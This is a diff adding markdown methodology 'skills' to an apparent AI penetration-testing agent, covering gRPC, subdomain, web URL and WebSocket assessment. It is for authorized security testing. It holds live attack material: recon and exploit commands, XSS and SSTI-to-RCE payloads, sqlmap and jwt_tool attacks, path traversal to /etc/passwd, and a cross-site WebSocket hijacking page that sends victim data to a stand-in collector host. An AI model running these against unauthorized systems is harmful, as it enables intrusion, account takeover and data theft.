+- Reflection enabled on a deliberately public/sandbox API — confirm it is the production surface.
+- `grpc.health.v1.Health/Check` returning `SERVING` is expected; not a finding alone.
+- `Unauthenticated`/`PermissionDenied` (codes 16/7) on unauth calls means authz works — the absence of these on privileged methods is the finding.
+- `Unimplemented` (code 12) means the method/service is not exposed there, not a bypass.
+- Self-IDOR: retrieving your own object via your own ID is not BOLA; you must cross a tenant/user boundary.
+- gRPC-Web 200 with an error `grpc-status` trailer is an application error, not access — read the trailer, not the HTTP code.
+
+## Chaining & Impact
+
+- Reflection → full method map → discover an unguarded `AdminService`/`InternalService` method → privileged action without credentials.
+- Missing per-method authz → BOLA across tenants → bulk PII/financial data exfiltration via list/stream RPCs.
+- Injection in a field → backend SQL/NoSQL compromise; a `bytes`/`Any` field feeding an unsafe deserializer → RCE on the service.
+- h2c downgrade → bypass front proxy auth/WAF → reach internal-only methods and admin RPCs.
+- Spoofed identity metadata trusted by an interceptor → authentication bypass → account takeover.
+- Service-proxy method with a URL/host field → SSRF into cloud metadata and internal microservices (see ssrf skill) → credential theft and lateral movement.
+
+## Pro Tips
+
+1. Always try reflection first; it converts a blind target into a fully described API in one command. If off, mine mobile apps and JS bundles for `.proto`/descriptor sets before giving up.
+2. Use `grpcurl -d @` with heredocs for complex nested messages and `oneof` fields that inline JSON makes awkward.
+3. The error code is the signal: `7`/`16` = authz active, `12` = not implemented, `3` (`InvalidArgument`) = you reached the handler and it parsed your input — keep fuzzing that one.
+4. Test the h2c backend port directly; teams forget the cleartext listener is reachable past the TLS/WAF front.
+5. Streaming RPCs are the soft underbelly — auth, rate limits, and input validation are routinely weaker than on unary methods.
+6. `grpcui` gives a browser form over reflection for fast manual method exploration; pair with Burp (Content-Type `application/grpc-web-text`) to fuzz the transcoded path.
+7. Run `semgrep` over recovered source for `WithInsecure`, registered reflection in prod, and methods lacking an auth interceptor — static gaps map directly to runtime tests.
+8. Keep load/exhaustion tests tiny and bounded (`ghz -n` low); the goal is to prove the missing limit, not to disrupt the service.

--- a/strix/skills/web/subdomain.md
+++ b/strix/skills/web/subdomain.md
@@ -1,0 +1,135 @@
+---
+name: subdomain
+description: End-to-end assessment of a single subdomain host (kind url) — DNS posture, exposed services, web app surface, and escalation paths.
+---
+
+# Subdomain
+
+A subdomain is one labeled host under a parent zone (`app.example.com`) that resolves to one or more services. Treat it as a self-contained attack surface: its DNS record graph, the ports/services behind the resolved IP(s), the web stack it serves, and the trust it inherits from the parent domain (shared cookies, CSP allowlists, OAuth redirect URIs, SSO). The objective is to assess this specific host and its services — fingerprint everything it exposes, find the weakest reachable service, and validate concrete impact on it, including paths that pivot back to the parent or sibling hosts.
+
+## Attack Surface
+
+- **DNS record graph** — A/AAAA, CNAME chains, NS delegations, MX, TXT/SPF/DMARC, CAA, and historical/passive records that hint at retired services.
+- **Network services** — every open TCP/UDP port on the resolved IP(s): web (80/443/8080/8443), admin/dev panels, DBs, caches, message brokers, SSH, RDP, mail.
+- **Virtual hosts** — the IP may serve many vhosts; the subdomain may route to a default/origin vhost or a forgotten one via Host-header confusion.
+- **Web application** — routes, APIs, auth flows, file uploads, parameters, JS bundles, source maps, exposed `.git`/`.env`/backups.
+- **Inherited trust** — wildcard or parent-scoped cookies (`Domain=.example.com`), CSP/`script-src` allowlists, CORS `*.example.com` rules, OAuth/SSO callback allowlists.
+- **TLS/cert metadata** — SAN entries leak sibling hosts; cert mismatch/expiry reveals dangling or default origins.
+- **CDN/WAF edge** — origin-IP exposure that bypasses the edge entirely.
+
+## Recon & Enumeration
+
+Most tools below ship in the Kali sandbox. Install the few that may be missing where noted.
+
+```bash
+H=app.example.com
+
+# 1) DNS posture — resolve all record types, follow CNAME chains
+dnsx -d $H -a -aaaa -cname -ns -mx -txt -caa -resp -silent
+dnsrecon -d $H -t std            # apt-get install -y dnsrecon if missing
+dig +nocmd $H any +multiline +noall +answer
+dig +short $H | tee /tmp/ips.txt  # collect resolved IPs
+
+# 2) Passive history & sibling discovery (SAN often reveals neighbors)
+subfinder -d $(echo $H | cut -d. -f2-) -all -silent | grep -i "\.$(echo $H|cut -d. -f2-)$"
+echo $H | tlsx -san -cn -silent  # cert SANs = more hosts to assess
+curl -s "https://crt.sh/?q=%25.$(echo $H|cut -d. -f2-)&output=json" | jq -r '.[].name_value' | sort -u
+
+# 3) Port/service scan of the resolved IP(s)
+naabu -host $H -top-ports 1000 -rate 1000 -silent -o /tmp/ports.txt
+nmap -sV -sC -Pn -p $(cut -d: -f2 /tmp/ports.txt | paste -sd, -) $(head -1 /tmp/ips.txt) -oN /tmp/nmap.txt
+
+# 4) HTTP fingerprint — status, tech, title, TLS, CDN/WAF, redirects
+echo $H | httpx -title -tech-detect -status-code -tls-grab -cdn -location \
+  -server -ip -follow-redirects -json -o /tmp/httpx.json
+wafw00f https://$H
+
+# 5) Content & API discovery
+katana -u https://$H -jc -kf all -d 3 -silent -o /tmp/urls.txt
+ffuf -u https://$H/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raydirectory.txt \
+  -mc 200,204,301,302,401,403 -ac -of csv -o /tmp/ffuf.csv
+ffuf -u https://$H/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc all -ac
+
+# 6) Vuln scan — automatic tech-mapped, scoped
+nuclei -u https://$H -as -s critical,high,medium -rl 50 -c 20 -timeout 10 -retries 1 -j -o /tmp/nuclei.jsonl
+nuclei -u https://$H -tags takeover,exposure,misconfig,default-login -silent
+
+# 7) Secret/source exposure
+trufflehog filesystem /tmp/site_dump --only-verified   # after downloading JS/source
+nuclei -u https://$H -tags exposure,config,backup -silent  # .git/.env/backups
+```
+
+Asset-specific installs if needed: `dnsx`/`subfinder`/`tlsx`/`httpx`/`katana`/`naabu` via `go install github.com/projectdiscovery/<tool>/...@latest`; `dnsrecon` via `apt-get install -y dnsrecon`; `gowitness` for screenshots via `go install github.com/sensepost/gowitness@latest`.
+
+## Methodology
+
+1. **Resolve and map DNS** — capture A/AAAA, CNAME chain, NS, MX, TXT; note third-party CNAME targets and the final IP(s). NXDOMAIN vs SERVFAIL vs branded 4xx distinguishes dead from delegated.
+2. **Check for dangling records** — a CNAME/A pointing at an unclaimed provider resource (S3, CloudFront, Pages, Azure App, Heroku, etc.) is a takeover candidate; cross-reference the dedicated `subdomain-takeover` methodology.
+3. **Port and service scan** the resolved IP — enumerate every open port, version, and default script output. Forgotten services (old admin panels, exposed DBs, monitoring) live on non-web ports.
+4. **Fingerprint the web stack** — server, framework, CMS, JS libraries, headers, TLS config, and whether a CDN/WAF fronts it.
+5. **Find the origin** — if behind a CDN, test SAN IPs, historical DNS, and `Host: $H` against candidate IPs to reach the unprotected origin.
+6. **Map content and APIs** — crawl with katana, brute directories/endpoints with ffuf, harvest URLs/params from JS bundles and source maps.
+7. **Probe vhost routing** — try `Host`-header overrides and absolute-URI requests to reach default/internal vhosts on the same IP.
+8. **Run targeted vuln checks** — nuclei automatic scan plus exposure/takeover/default-login tags; then manual testing of the highest-value endpoints found.
+9. **Assess inherited trust** — cookie `Domain` scope, CSP/CORS allowlists, OAuth redirect acceptance; determine whether compromising this host pivots to the parent.
+10. **Validate and chain** — turn the best finding into a reproducible PoC and map its blast radius.
+
+## Key Weaknesses / Techniques
+
+- **Dangling DNS / subdomain takeover** — CNAME to an unclaimed resource. Confirm the provider "missing resource" fingerprint, then (with authorization) claim and serve unique proof. See `subdomain-takeover`.
+  - `echo $H | httpx -status-code -body -silent | grep -iE "no such app|NoSuchBucket|There isn't a GitHub Pages site"`
+- **Exposed non-web services** — DB/cache/broker bound to public IP.
+  - `nmap -Pn -sV -p6379,9200,27017,3306,5432,11211,5601,9000 $(head -1 /tmp/ips.txt) --script="*-info,*-empty-password"`
+- **Origin-IP exposure (CDN bypass)** — reach the backend directly, defeating WAF/rate limits.
+  - `curl -sk --resolve $H:443:<origin_ip> https://$H/ -H "Host: $H" -o /dev/null -w "%{http_code}\n"`
+- **Default/forgotten vhost via Host header** — same IP, different routing.
+  - `curl -sk https://$H/ -H "Host: internal-admin.example.com"` and `curl -sk https://$H/ -H "Host: localhost"`
+- **Source/secret exposure** — `.git`, `.env`, `.DS_Store`, backups, source maps, exposed CI/CD configs.
+  - `curl -s https://$H/.git/config` ; `curl -s https://$H/.env` ; harvest `*.js.map` then `trufflehog filesystem ./dump --only-verified`
+- **Default credentials / exposed admin panels** — Grafana, Jenkins, Kibana, phpMyAdmin, Actuator.
+  - `nuclei -u https://$H -tags default-login,panel,exposure -silent`
+  - `curl -s https://$H/actuator/env` ; `curl -s https://$H/actuator/heapdump -o heap.bin`
+- **Web app classes** — injection, IDOR, SSRF, auth bypass on discovered endpoints.
+  - `sqlmap -u "https://$H/item?id=1" --batch --risk 2 --level 3 --random-agent`
+  - `jwt_tool <token> -M at -t https://$H/api/me` for JWT flaws on authenticated routes
+- **TLS misconfig** — expired/mismatched certs, weak ciphers, SAN leaking internal hosts.
+  - `echo $H | tlsx -expired -self-signed -mismatched -cipher -silent`
+- **Inherited-trust abuse** — parent-scoped cookies readable from a takeover, CSP allowlisting this host so injected JS runs in the parent's context, OAuth callback accepting this host.
+
+## Validation
+
+1. **DNS/service finding** — record the pre-state (resolve output, port banner, HTTP status/body/headers) and a reproducible command that triggers it; for takeover, serve a unique token page over HTTPS and show it rendering at `$H`.
+2. **Exposed service** — read one harmless, clearly non-public artifact (e.g., empty-auth Redis `INFO`, ES `_cat/indices`, Actuator `/env`) and capture the raw response; do not modify data.
+3. **Web vuln** — produce a minimal PoC: the exact request, the differential proving exploitation (reflected marker, extracted row, 200 on an unauthorized object), and steps to reproduce.
+4. **Origin bypass** — show identical app response via `--resolve` to the origin IP while the edge blocks/rate-limits, proving the WAF is out of path.
+5. **Trust pivot** — demonstrate the cookie/CSP/OAuth acceptance with a request/response pair, not just configuration inference.
+
+## False Positives
+
+- **Branded "missing resource" pages that are not claimable** — provider now enforces TXT/ownership; not a takeover.
+- **Wildcard DNS / catch-all vhost** — every label resolves and returns the same app; "discovered" hosts are not distinct assets.
+- **CDN/WAF interstitials** — 403/406/429 from the edge are not app vulnerabilities; confirm against the origin.
+- **Shared-IP banners from nmap** — services seen on the IP may belong to a neighboring tenant/vhost, not this host; verify the service answers for `$H` specifically.
+- **Reflected OAST/SSRF hits sourced from your own box** — confirm the callback IP is the server, not the scanner.
+- **Expired-cert / weak-cipher findings on a redirect-only `80`→`443`** — low impact; verify the weak endpoint actually serves data.
+- **Nuclei `info`/`low` informational matches** — fingerprints, not findings.
+
+## Chaining & Impact
+
+- **Takeover → parent compromise** — serve content on a trusted subdomain → read `Domain=.example.com` cookies, satisfy CSP `script-src *.example.com` to inject into the parent, or pass an OAuth redirect allowlist → account takeover.
+- **Exposed service → data/RCE** — public Redis/Elasticsearch/Mongo → data theft or, via Redis module/cron or FCGI, code execution → shell on the host.
+- **Origin bypass → unfiltered exploitation** — reach the backend directly to run injection/auth attacks the WAF would have blocked.
+- **Secret exposure → cloud pivot** — `.env`/source-map/`.git` leaks an API key or cloud credential → control-plane access (buckets, secrets), then lateral movement.
+- **Forgotten vhost → internal app** — Host-header routing to a staging/admin app with weaker auth → privileged functionality.
+- **Default-login panel → CI/CD** — Jenkins/Grafana/Actuator → pipeline access, deploy keys, and the rest of the estate.
+
+## Pro Tips
+
+1. Always assess the resolved IP, not just the URL — the most serious findings on a subdomain are frequently non-web services nobody remembered binding publicly.
+2. Cert SANs and CT logs are free recon: one host's certificate often enumerates the whole sibling set worth assessing next.
+3. Distinguish edge from origin early; testing the CDN tells you about the CDN, not the app. `--resolve` to candidate origin IPs to confirm.
+4. A subdomain's real value is inherited trust — check cookie `Domain`, CSP, CORS, and OAuth allowlists before deciding a finding is "just" on a side host.
+5. Old/passive DNS and historical IPs reveal retired services that are still listening; query passive sources, not only the live record.
+6. Wildcard zones inflate enumeration — verify a host is distinct (unique content/cert/headers) before spending time on it.
+7. Keep nuclei scoped with `-as` plus targeted tags (`takeover,exposure,default-login,misconfig`); broad unscoped runs bury the real signal.
+8. When a CNAME points at a third party, check the dedicated takeover methodology before assuming it is benign — verification gaps and race windows are common.

--- a/strix/skills/web/url.md
+++ b/strix/skills/web/url.md
@@ -1,0 +1,206 @@
+---
+name: url
+description: End-to-end methodology for assessing a single web application URL — crawl, map, fingerprint, and test every reachable surface.
+---
+
+# URL (Web Application)
+
+A URL points at a live web application: a host, a scheme/port, and a path tree served over HTTP(S). The asset context is "crawl and test the web application at this URL," so the objective is to expand that single entry point into the full reachable surface — routes, parameters, APIs, auth flows, client-side JS, and supporting infrastructure — then validate concrete vulnerabilities against it. Treat the URL as a seed, not a boundary: everything you can reach same-origin (and the documented in-scope hosts it talks to) is fair game for authorized testing.
+
+## Attack Surface
+
+**Transport / edge**
+- TLS config, redirect chains (`http→https`, apex↔www), HSTS, alternate ports, HTTP/2 and HTTP/1.1 differentials, CDN/WAF in front of origin.
+
+**Routing & content**
+- Static routes and SPA client routes, server-rendered templates, file extensions (`.php/.aspx/.jsp/.do`), virtual hosts on the same IP.
+
+**Parameters & inputs**
+- Query string, path segments, POST bodies (form/JSON/multipart), headers (`Host`, `X-Forwarded-*`, `Referer`, `User-Agent`), cookies, and file uploads.
+
+**APIs**
+- REST/JSON endpoints, GraphQL (`/graphql`), gRPC-web, WebSockets (`ws(s)://`), backend-for-frontend routes called by the SPA.
+
+**Auth & session**
+- Login/registration/reset flows, OAuth/OIDC/SAML redirects, session cookies, JWTs, API keys, CSRF tokens.
+
+**Client-side**
+- Inline and external JS (routes, secrets, feature flags), sourcemaps (`.map`), `postMessage` handlers, DOM sinks, third-party scripts.
+
+**Exposed artifacts**
+- `robots.txt`, `sitemap.xml`, `/.well-known/`, `.git/`, `.env`, backup files, Swagger/OpenAPI (`/openapi.json`, `/swagger.json`), admin panels, debug/actuator endpoints.
+
+## Recon & Enumeration
+
+Set up workspace and a base URL variable; keep all output structured for downstream steps.
+
+```bash
+mkdir -p recon crawl loot
+U="https://target.tld"; H="target.tld"
+```
+
+Probe liveness, fingerprint tech, and identify the edge:
+
+```bash
+httpx -u "$U" -sc -title -server -td -location -fr -tls-grab -ip -cname -cdn -timeout 10 -j -o recon/httpx.jsonl
+wafw00f "$U" | tee recon/wafw00f.txt          # WAF/CDN identity decides throttle + evasion
+whatweb -a 3 "$U" | tee recon/whatweb.txt
+```
+
+Discover sibling hosts and ports (same-IP vhosts and origin behind CDN):
+
+```bash
+subfinder -d "$H" -all -silent -o recon/subs.txt
+naabu -host "$H" -top-ports 1000 -rl 1000 -silent -o recon/ports.txt
+nmap -sV -sC -Pn -p- --min-rate 2000 "$H" -oA recon/nmap   # full TCP, service/version
+dnsx -l recon/subs.txt -a -resp -silent -o recon/dns.txt    # resolve, find origin IPs
+```
+
+Crawl breadth-first, including JS-discovered and XHR endpoints:
+
+```bash
+katana -u "$U" -d 4 -jc -jsl -kf all -xhr -c 10 -p 10 -rl 50 -timeout 10 \
+  -ef png,jpg,jpeg,gif,svg,css,woff,woff2,ttf,eot,map -silent -j -o crawl/katana.jsonl
+gospider -s "$U" -d 3 -c 10 -t 20 --other-source >> crawl/gospider.txt   # second pass
+```
+
+Extract URLs, parameters, and JS for analysis:
+
+```bash
+jq -r '.request.endpoint // .endpoint' crawl/katana.jsonl | sort -u > crawl/urls.txt
+grep -oP '\?.*' crawl/urls.txt | grep -oP '[?&]\K[^=&]+' | sort -u > crawl/params.txt
+# Pull JS, hunt for routes/secrets
+mkdir -p loot/js && katana -u "$U" -d 3 -silent | grep -iE '\.js(\?|$)' | sort -u > crawl/js.txt
+while read j; do curl -s "$j" -o "loot/js/$(echo "$j"|md5sum|cut -c1-12).js"; done < crawl/js.txt
+trufflehog filesystem loot/js --only-verified --json > loot/js_secrets.json
+gitleaks detect --no-git -s loot/js -r loot/js_gitleaks.json 2>/dev/null
+grep -rhoP '"/[a-zA-Z0-9_./{}-]+"' loot/js | tr -d '"' | sort -u > crawl/js_routes.txt
+```
+
+Content discovery against the live tree (use crawl output to seed an extension/path list):
+
+```bash
+ffuf -u "$U/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt \
+  -mc 200,204,301,302,307,401,403,405 -ac -rate 50 -t 25 -o recon/ffuf_dirs.json
+ffuf -u "$U/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
+  -e .bak,.old,.zip,.tar.gz,.json,.config,.env,.git -mc all -ac -fc 404 -o recon/ffuf_files.json
+```
+
+Targeted template scan once tech is known:
+
+```bash
+nuclei -u "$U" -as -s critical,high,medium -rl 50 -c 20 -timeout 10 -retries 1 -j -o recon/nuclei.jsonl
+nuclei -u "$U" -tags exposure,misconfig,token,debug -severity high,critical -silent
+```
+
+Pull an OpenAPI/Swagger spec if present and import it directly:
+
+```bash
+for p in /openapi.json /swagger.json /v2/api-docs /api-docs /swagger/v1/swagger.json; do
+  curl -fsS "$U$p" -o "recon/spec.json" && break; done
+nuclei -u "$U" -im openapi -l recon/spec.json -silent   # spec-driven endpoint testing
+```
+
+If you find a `.git/` directory, dump and audit it:
+
+```bash
+git clone https://github.com/internetwache/GitTools 2>/dev/null
+GitTools/Dumper/gitdumper.sh "$U/.git/" loot/git && trufflehog filesystem loot/git --only-verified
+```
+
+## Methodology
+
+1. **Confirm and normalize the target.** Resolve the host, follow the redirect chain with `httpx -fr -location`, note the final origin, scheme, and any port forks. Record whether a WAF/CDN sits in front (`wafw00f`) — it shapes everything after.
+2. **Fingerprint the stack.** Server, framework, language, CMS, and versions via `httpx -td` + `whatweb` + `nuclei -as`. Map to known CVEs but verify each against the live app rather than trusting version banners.
+3. **Map the surface.** Crawl with Katana (JS + known-files + XHR), supplement with gospider, and content-discover with ffuf. Merge into one deduplicated `urls.txt`. Pull and parse every JS bundle for routes, API base paths, feature flags, and secrets.
+4. **Catalog inputs.** For each route, enumerate query params, body fields (form/JSON/multipart), headers, and cookies. Build a parameter inventory; `arjun -u "$U/path" -oT recon/arjun.txt` finds hidden params the crawl missed.
+5. **Establish auth context.** Register/log in if credentials are in scope; capture session cookies/JWT. Decode the JWT (`jwt_tool <token>`) and inspect cookie flags. Map authenticated vs unauthenticated route sets and role boundaries.
+6. **Test injection sinks.** Reflected/stored values → XSS; DB-backed params → SQLi; template-rendered input → SSTI; URL/fetch params → SSRF; file paths → traversal/LFI; command-adjacent params → RCE. Drive systematically from the parameter inventory.
+7. **Test access control.** Swap IDs (IDOR), strip/forge tokens, hit admin/actuator routes unauthenticated, and replay one role's requests as another (BFLA). Compare responses, not just status codes.
+8. **Test logic and state.** Multi-step flows (checkout, reset, MFA), coupon/quota reuse, race conditions on stateful endpoints, mass assignment on JSON bodies.
+9. **Test the edge & client.** Host-header injection, `X-Forwarded-*` trust, open redirect, CORS misconfig, request smuggling on HTTP/1.1, `postMessage`/DOM-XSS in the SPA.
+10. **Validate, chain, report.** Build a minimal reproducible PoC for each finding, rule out false positives, and chain primitives into demonstrable impact.
+
+## Key Weaknesses / Techniques
+
+**Reflected / Stored / DOM XSS** — Inject a marker into every reflected param and search responses; for DOM sinks, trace tainted `location`/`postMessage` data to `innerHTML`/`eval`.
+```
+"><svg onload=alert(document.domain)>
+'};alert(document.domain);//
+```
+
+**SQL injection** — Confirm with boolean/time diffs, then offload to sqlmap:
+```bash
+sqlmap -u "$U/item?id=1" --batch --level 3 --risk 2 --random-agent --technique=BEUST --dbs
+sqlmap -r recon/request.txt --batch --dbs   # for POST/JSON/cookie params, save raw request first
+```
+
+**SSTI** — Probe `{{7*7}}`, `${7*7}`, `#{7*7}`, `<%= 7*7 %>`; a `49` reflection confirms. Escalate to RCE per engine (Jinja2 `{{ cycler.__init__.__globals__.os.popen('id').read() }}`).
+
+**SSRF** — Any `url=`, `image=`, `webhook=`, `next=` style fetch param. Confirm blind egress with OAST:
+```bash
+interactsh-client -v        # yields a fresh *.oast.fun domain; embed it in the param
+```
+Then pivot to `169.254.169.254` / `metadata.google.internal` per cloud.
+
+**Path traversal / LFI** — `?file=../../../../etc/passwd`, null-byte/encoding variants, PHP wrappers (`php://filter/convert.base64-encode/resource=index.php`).
+
+**IDOR / BFLA** — Increment/UUID-swap object identifiers across two authenticated sessions; access role-gated routes (`/admin`, `/api/internal/*`) with a low-priv token.
+
+**Open redirect / Host-header** — `?next=//evil.tld`, `?url=https:evil.tld`; inject `Host: evil.tld` and `X-Forwarded-Host: evil.tld` and watch for it in password-reset links or cache keys.
+
+**CORS misconfig** — Reflect `Origin: https://evil.tld` and check for `Access-Control-Allow-Origin: <reflected>` + `Allow-Credentials: true`:
+```bash
+curl -s -I "$U/api/me" -H "Origin: https://evil.tld" | grep -i access-control
+```
+
+**Auth/JWT** — `alg:none`, weak HMAC secret, `kid` injection, missing signature check:
+```bash
+jwt_tool "$TOKEN" -M at -t "$U/api/me" -rh "Authorization: Bearer "   # all attacks against endpoint
+jwt_tool "$TOKEN" -C -d /usr/share/wordlists/rockyou.txt              # crack HMAC secret
+```
+
+**File upload** — Bypass content-type/extension filters; upload polyglot/webshell where execution is reachable; confirm by requesting the stored path.
+
+**Exposed config / secrets** — `.env`, `.git/config`, `actuator/env`, sourcemaps. Run `trufflehog`/`gitleaks` over dumped artifacts; verify keys against their provider before reporting.
+
+## Validation
+
+1. **Reproduce with a single clean request.** Capture the exact method, URL, headers, and body (`curl` or saved Burp request). A finding the agent can't replay deterministically is not a finding.
+2. **Prove the security boundary was crossed**, not just anomalous output: XSS = JS executes in the victim origin; SQLi = controlled DB output or true/false oracle; SSRF = server-sourced OAST hit (source IP is the server, not the tester); IDOR = another user's data returned.
+3. **Use harmless markers.** `alert(document.domain)` for XSS, `id`/`whoami` for RCE, a benign internal read for SSRF. Never destructive payloads.
+4. **Diff against a baseline.** Compare the malicious response to the normal one (status, length, timing, content) to defeat generic error pages and reflection-without-execution.
+5. **Confirm persistence/scope** for stored issues — does the payload fire for a different session/user?
+
+## False Positives
+
+- **Reflection ≠ XSS.** Value echoed but HTML-encoded or in a non-executing context is informational only; confirm execution in a real browser/DOM.
+- **Version-banner CVEs.** `httpx -td`/nuclei version matches often flag back-ported or non-applicable CVEs; validate the actual vulnerable behavior.
+- **403/401 on discovery** means the path exists but is gated — not automatically a vuln; verify it's reachable by an unintended principal.
+- **WAF block pages** returning 200 with a challenge look like success; check body content, not just status.
+- **Self-XSS / no cross-user impact** — payloads that only fire in the attacker's own session.
+- **OAST hits from the tester's own browser/client** rather than the server — check the source IP before calling SSRF.
+- **CORS to `*` without credentials** is usually low/no risk; impact needs reflected origin + `Allow-Credentials: true`.
+- **Open redirect to same-origin** or to a strict allowlist is not exploitable.
+
+## Chaining & Impact
+
+- **Sourcemap/JS secret → API key → authenticated API → data exfil.** Leaked frontend secrets routinely unlock backend scope.
+- **SSRF → cloud metadata → IAM credentials → control-plane access** (list buckets, read secrets, pivot).
+- **IDOR + mass assignment → privilege escalation** (set `role:admin` on a profile-update endpoint).
+- **Open redirect / host-header injection → OAuth token theft or poisoned password-reset link → account takeover.**
+- **Reflected XSS + permissive CORS + no CSRF protection → full session/account compromise** via a single crafted link.
+- **Exposed `.git`/`.env` → source + DB creds → direct backend access or further SQLi/RCE.**
+- **SQLi → stacked queries / `xp_cmdshell` / `INTO OUTFILE` webshell → RCE → host foothold.**
+- **File upload → webshell in an executable path → RCE.**
+
+## Pro Tips
+
+1. JS bundles are the richest map of a modern app — parse them first; routes, hidden params, internal API hosts, and dead-but-live endpoints all live there.
+2. Always test the unauthenticated and authenticated surface separately, then a second low-priv role; the most valuable bugs sit at the boundary between them.
+3. Save raw requests (Burp/`curl -v`) so sqlmap/jwt_tool/replay operate on the exact session, cookies, and CSRF tokens — re-deriving auth per tool wastes time and misses bugs.
+4. Behind a CDN, find the origin IP (`dnsx` over historical subdomains, SAN certs, `Host`-header pivots) and test it directly to bypass the WAF.
+5. Diff responses by length/timing/ETag, not status alone — many apps mask everything as 200 or a generic error.
+6. Throttle to the WAF: once `wafw00f` names the edge, set `-rl`/`-rate` low and rotate payload encodings rather than getting the IP blocked mid-assessment.
+7. Re-crawl after authenticating and after each role switch — the route graph changes and new sinks appear.
+8. Chain to durable, demonstrable impact (one harmless internal read, one cross-user record, one short-lived token) and stop — don't pivot beyond the authorized scope.

--- a/strix/skills/web/websocket.md
+++ b/strix/skills/web/websocket.md
@@ -1,0 +1,169 @@
+---
+name: websocket
+description: WebSocket testing for handshake/origin flaws, auth gaps, message tampering, and cross-site hijacking
+---
+
+# WebSocket
+
+A WebSocket endpoint upgrades an HTTP connection into a persistent, full-duplex `ws://`/`wss://` channel that carries application messages (often JSON, MessagePack, or a custom binary frame) outside the normal request/response model. The attacker's objective is to abuse the one-time HTTP handshake (where most auth and `Origin` enforcement lives) and then tamper with the long-lived bidirectional message stream that frequently skips the per-message authorization, validation, and rate limiting applied to REST routes.
+
+## Attack Surface
+
+**Scope**
+- The HTTP `Upgrade: websocket` handshake (auth, `Origin`, cookies, tokens, subprotocols)
+- Inbound client→server messages (commands, RPC, GraphQL/STOMP/SignalR/Socket.IO/MQTT-over-WS, chat)
+- Outbound server→client broadcasts (data leaked to the wrong subscriber/room/tenant)
+- Reverse-proxy/CDN/load-balancer upgrade path (smuggling, header rewriting, sticky sessions)
+
+**Entry Points**
+- Endpoints: `/ws`, `/socket`, `/cable` (Rails ActionCable), `/socket.io/`, `/graphql` (subscriptions), `/signalr`, `/stomp`, `/mqtt`, `/_next/webpack-hmr`, `/livereload`
+- Auth material: cookies sent automatically on handshake, `?token=`/`?access_token=` query params, `Sec-WebSocket-Protocol` carrying a bearer token, first-message `auth` envelope
+- Channel/room/topic identifiers and subscription filters chosen by the client
+- Message `type`/`action`/`event` dispatch fields routed to server handlers
+
+**Less Obvious**
+- HMR/livereload dev sockets exposed in production
+- Admin/metrics/log-tail sockets with weaker auth than the main app
+- gRPC-Web / WebTransport fallbacks and Socket.IO long-polling transport (`?transport=polling`) which behaves like plain HTTP
+
+## Recon & Enumeration
+
+Discover endpoints from the running app and JS bundles:
+```
+katana -u https://target.tld -jc -kf all -d 3 -o katana.txt
+grep -aiE 'wss?://|new WebSocket|io\(|socket\.io|/cable|/signalr|stomp|webpack-hmr' katana.txt
+# crawl + dump JS, then grep paths/tokens
+katana -u https://target.tld -jc -em js -o js_urls.txt
+ffuf -u https://target.tld/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 101,200,400,426 -fs 0
+```
+
+Fingerprint the handshake and tech with httpx/nuclei (101 == upgrade accepted):
+```
+httpx -l targets.txt -H "Connection: Upgrade" -H "Upgrade: websocket" \
+  -H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
+  -status-code -title -tech-detect -o httpx_ws.txt
+nuclei -u https://target.tld -tags websocket,socketio,signalr,exposure -s critical,high,medium -silent
+naabu -host target.tld -p 80,443,8080,8443,3000,6001,15674 -silent   # find non-standard ws ports
+```
+
+Interactive clients in/for the Kali sandbox (install asset-specific tooling as needed):
+```
+pip install websocket-client websockets   # python clients + wsdump.py
+npm i -g wscat                             # CLI: wscat -c wss://target.tld/ws
+# wsrepl (interactive WS pentest REPL) and STÖK's "ws" tooling:
+pipx install wsrepl
+# Burp Suite (sandbox): Proxy > WebSockets history; repeat/edit frames in Repeater
+```
+
+Connect and observe, sending raw frames:
+```
+wscat -c "wss://target.tld/ws" -H "Origin: https://target.tld" -H "Cookie: session=..."
+# read-only capture of server pushes
+python3 -c "import websocket,sys; ws=websocket.create_connection('wss://target.tld/ws'); \
+print(ws.recv())"
+```
+
+## Methodology
+
+1. **Map endpoints & transport** — Crawl with katana, grep JS for `new WebSocket`, `io()`, `/cable`, `/signalr`. Note path, subprotocol, framing (JSON vs binary vs Socket.IO/STOMP), and where auth lives (cookie/query/subprotocol/first message).
+2. **Baseline a legit session** — In Burp, log in normally and capture a full working handshake + the message sequence (subscribe, auth, a real command and its response). This is your replay template.
+3. **Attack the handshake** — Replay the upgrade with a forged/missing `Origin`, no cookies, an expired/null token, and a foreign user's token. Record what the server accepts.
+4. **Test cross-site hijacking (CSWSH)** — Determine whether the connection is authenticated purely by ambient cookies with no `Origin` check and no CSRF-style token.
+5. **Probe per-message authz** — After connecting as a low-priv user, swap IDs/channels/topics in messages to access other users/tenants/rooms (the WS equivalent of IDOR/BFLA).
+6. **Tamper message content** — Mutate `type`/`action`, inject extra fields (mass assignment), send malformed/oversized/out-of-order frames, and feed message payloads into XSS/SQLi/NoSQLi/SSTI/command sinks.
+7. **Test channel/subscription isolation** — Subscribe to wildcard or other tenants' topics; check if broadcasts leak to unauthorized subscribers.
+8. **Resource & lifecycle** — Auth-after-connect race, ping/pong and idle timeout abuse, unbounded message size, connection flooding, slow-loris on the upgrade.
+9. **Validate & chain** — Build a minimal PoC (a single HTML page for CSWSH, or a scripted client) proving cross-user data access or state change, then map to durable impact.
+
+## Key Weaknesses / Techniques
+
+### Missing/weak Origin validation → Cross-Site WebSocket Hijacking (CSWSH)
+Browsers send cookies on a cross-origin WS handshake and the same-origin policy does **not** block opening a WebSocket. If the server authenticates only via cookies and does not validate `Origin`, an attacker page silently connects as the victim. Assess by replaying the handshake with an arbitrary origin:
+```
+wscat -c "wss://target.tld/ws" -H "Origin: https://evil.example" -H "Cookie: session=<victim>"
+```
+PoC page (victim simply visits) — exfiltrates streamed data:
+```html
+<script>
+const ws = new WebSocket("wss://target.tld/ws");      // cookies auto-sent
+ws.onopen = () => ws.send(JSON.stringify({type:"getMessages"}));
+ws.onmessage = e => fetch("https://collector.example/x?d="+encodeURIComponent(e.data));
+</script>
+```
+If the handshake succeeds and returns victim data with a forged/absent `Origin`, it is exploitable.
+
+### Authentication & authorization gaps
